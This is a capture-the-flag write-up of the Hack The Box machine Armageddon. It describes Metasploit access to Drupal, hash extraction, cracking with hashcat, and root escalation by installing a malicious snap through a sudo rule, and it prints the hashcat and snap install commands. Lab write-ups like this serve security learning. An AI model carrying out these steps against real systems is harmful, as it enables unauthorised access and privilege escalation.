Armageddon HTB

I used metasploit module to get a meterpreter shell on the machine.

Once I was on the machine I headed to the /var/www/html/ directory and searched for the configuration file :

So I uploaded jolly-dumper on the machine and started looking around, I found brucetherealadmin’s password’s hash in drupal.users column :

I then used hashcat to crack it :

$ hashcat -m 7900 <hash> <wordlist> # 7900 is the Hash-Mode for Drupal7

Then I connected via ssh as user brucetherealadmin and checked for the usual sudo -l command :

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

So I looked online for an exploit with snap and found a malicious payload that could create a user with full sudo access.
The payload is from exploit-db and it looked like this :

As it’s encoded in base64, I decoded and outputed it to a payload.snap file :

Then I installed it, which resulted in the creation of a malicious user :

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

Finally I switched user and got root access :
